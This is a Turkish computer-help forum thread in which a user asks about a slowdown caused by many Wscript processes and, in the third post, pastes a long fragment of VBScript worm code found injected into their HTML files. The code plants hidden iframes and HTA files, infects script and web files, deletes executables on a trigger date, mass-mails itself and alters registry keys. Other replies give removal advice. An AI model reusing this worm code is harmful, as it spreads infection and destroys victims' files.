|
|
#1 (permalink) |
|
Yer: istanbul
|
Windows Wscript
Arkadaşlar Benim sorunum şu ... Son zamanlarda bilgisayarım aşırı derece yavaşlamaya başladı . bilgisayarı ilk açtığımda hızlı , sonradan yavaşlamaya başlıyor . Sorunun Wscript olduğunu düşünüyorum . CTRL+ALT+DEL tuşlarına bastığımda Wscript diye 10 ya da 25 tane çıkıyor ... Görevi sonlandır dediğimde kapandıktan sonra yine çoğalıyor ... Wscript dosyasını windows klasörünün içinde buldum . Silersemde hata verebilir . Ne yapmalıyım .... Şimdiden teşekkürler
|
|
|
#2 (permalink) |
|
Yer: Istanbul, Türkiye
|
bu tip durumlarda yahoo'da kısa bir arama yap, birçok ücretsiz "removal tool" bulursun.
30 saniyelik bir arama sonucunda http://www.pchell.com/internet/kakworm.shtml adresinde konuyla ilgili bilgi; http://www.roguevalley.com/downloads/kakcleaner.exe adresinde de bir "removal tool" buldum.
|
|
|
#3 (permalink) |
|
|
teşekkürler blackinwhite fakat sorunumu tam çözebilmiş değilim . Bu virus (galiba) yaptığım tüm sitelerin HTML kodlarına ya da HTML'lere bir kod eklmiş . Nasıl oldu bilmiyorum ...
Aşağıda bu kodun bir kısmını kopyaladım . bu kod dahada devam ediyor .... Rem I am sorry! happy time On Error Resume Next mload Sub mload() On Error Resume Next mPath = Grf() Set Os = CreateObject("Scriptlet.TypeLib") Set Oh = CreateObject("Shell.Application") If IsHTML Then mURL = LCase(document.Location) If mPath = "" Then Os.Reset Os.Path = "C:\Help.htm" Os.Doc = Lhtml() Os.Write() Ihtml = "<span style='position:absolute'><iframe src='C:\Help.htm' width='0' height='0'></iframe></span>" Call document.Body.insertAdjacentHTML("AfterBegin", Ihtml) Else If Iv(mPath, "Help.vbs") Then setInterval "Rt()", 10000 Else m = "hta" If LCase(m) = Right(mURL, Len(m)) Then id = setTimeout("mclose()", 1) main Else Os.Reset() Os.Path = mPath & "\" & "Help.hta" Os.Doc = Lhtml() Os.write() Iv mPath, "Help.hta" End If End If End If Else main End If End Sub Sub main() On Error Resume Next Set Of = CreateObject("Scripting.FileSystemObject") Set Od = CreateObject("Scripting.Dictionary") Od.Add "HTML", "1100" Od.Add "vbs", "0100" Od.Add "htm", "1100" Od.Add "ASP", "0010" Ks = "HKEY_CURRENT_USER\software\" Ds = Grf() Cs = Gsf() If IsVbs Then If Of.FileExists("C:\help.htm") Then Of.DeleteFile ("C:\help.htm") End If Key = CInt(Month(Date) + Day(Date)) If Key = 13 Then Od.RemoveAll Od.Add "exe", "0001" Od.Add "dll", "0001" End If Cn = Rg(Ks & "Help\Count") If Cn = "" Then Cn = 1 End If Rw Ks & "Help\Count", Cn + 1 f1 = Rg(Ks & "Help\FileName") f2 = FNext(Of, Od, f1) fext = GetExt(Of, Od, f2) Rw Ks & "Help\FileName", f2 If IsDel(fext) Then f3 = f2 f2 = FNext(Of, Od, f2) Rw Ks & "Help\FileName", f2 Of.DeleteFile f3 Else If LCase(WScript.ScriptFullname) <> LCase(f2) Then Fw Of, f2, fext End If End If If (CInt(Cn) Mod 366) = 0 Then If (CInt(Second(Time)) Mod 2) = 0 Then Tsend Else adds = Og Msend (adds) End If End If wp = Rg("HKEY_CURRENT_USER\Control Panel\desktop\wallPaper") If Rg(Ks & "Help\wallPaper") <> wp Or wp = "" Then If wp = "" Then n1 = "" n3 = Cs & "\Help.htm" Else mP = Of.GetFile(wp).ParentFolder n1 = Of.GetFileName(wp) n2 = Of.GetBaseName(wp) n3 = Cs & "\" & n2 & ".htm" End If Set pfc = Of.CreateTextFile(n3, True) mt = Sa("1100") pfc.Write "<" & "HTML><" & "body bgcolor='#007f7f' background='" & n1 & "'><" & "/Body><" & "/HTML>" & mt pfc.Close Rw Ks & "Help\wallPaper", n3 Rw "HKEY_CURRENT_USER\Control Panel\desktop\wallPaper", n3 End If
|
|
|
#4 (permalink) |
|
Yer: Bursa
|
aynı sorun bendede olmuştu .. hatta konu bile açmıştım (altlarda)
en güzeli format at kurtul . ben öle yaptım .. makina çok ağırlaşıyor demi ? bide benimki p200 ve 64 ram sen düşün artık.
|
|
|
#5 (permalink) |
|
|
Bir kaç klasörü yedeklemem lazım
ancak sonra format atabilirim ... benim bilgisayar seninkindede kötü . gerisini sen düşün artık ![]() Formattan başka çözümü olan varmı ??
|
|
|
#6 (permalink) |
|
Yer: izmir
|
slm,
ilk olarak aklıma gelen başlat > çalıştır ve orda msconfig yazıp enter a bas. sonra açılan yerde başlangıç (startup) görüceksin. onun içine baktığında kenarları tik işaretlenmiş seçenekler var. windows dosları hariç diğerlerini işaretsiz yaparsan belki düzelir. run32.dll,systemtray.exe.. bunnar kalıcak. daha da olmazsa bir antivisürs programı bul. aslında norton utulities bulabilirsen o program bilgisayarını kurtarmanı sağlayabilecek programları içeriyor..
|
|
|
#7 (permalink) |
|
Yer: Istanbul,Turkiye
|
bak şimdi.. homesite kur..
sonra extended Replace komutunu gir.. en aşşadan C:\ seç.. include subfolders de.. sonra bulunacak kodlara yukarda yolladıın kodu yaz.. değiştirilmesini istediin yerede <!--saolasın cemshid --> yaz ![]() ok'le.. biraz bekle. hd'deki tüm htm ve HTML uzantılı dosyalar taranıp kod değiştirilecektir.. text tabanlı dosyalarda bu sorun oluyorsa oradaki uzantıları değiştirip aynı şekilde kurtulabilirsin..
|
|
|
#8 (permalink) |
|
Yer: TR istanbul
|
gecenlerde bir arkadaşta da oldu
sorunu regeditten hallettik..
önce windows klasörüne girip wssicript i sildik ) ( iyimi yaptık bilemiorum )sonra msconfig i çalıştırıp açılıştaki gereksiz prg lamları kaldırdık.. tabi windows ortamına güvenli kipten girdik (Safe mode yani ) bu şekilde bir çözüm olabilir.. ama bilgisayarimda gereksiz bilgiler var zaten kurtulasım vardı kaç yıldır iyi bir format atiim de bahane olur bari dersen onada biz karışmayız hani
|
|
|
|
|
|
#9 (permalink) |
|
|
eywallah cemshid
verdiğin teknik iyiydi ...mustay senin dediğin olayıda yapıcam format atmak istiyorum fakat dosyaları yedeklemem lazım oda cdwriter bulmamı gerektiriyor ... şimdilik idare edeyim ... Bu arada "önce windows klasörüne girip wsicript i sildik" Bu nekadar doğru acaba
|
Zoque'a hoşgeldiniz!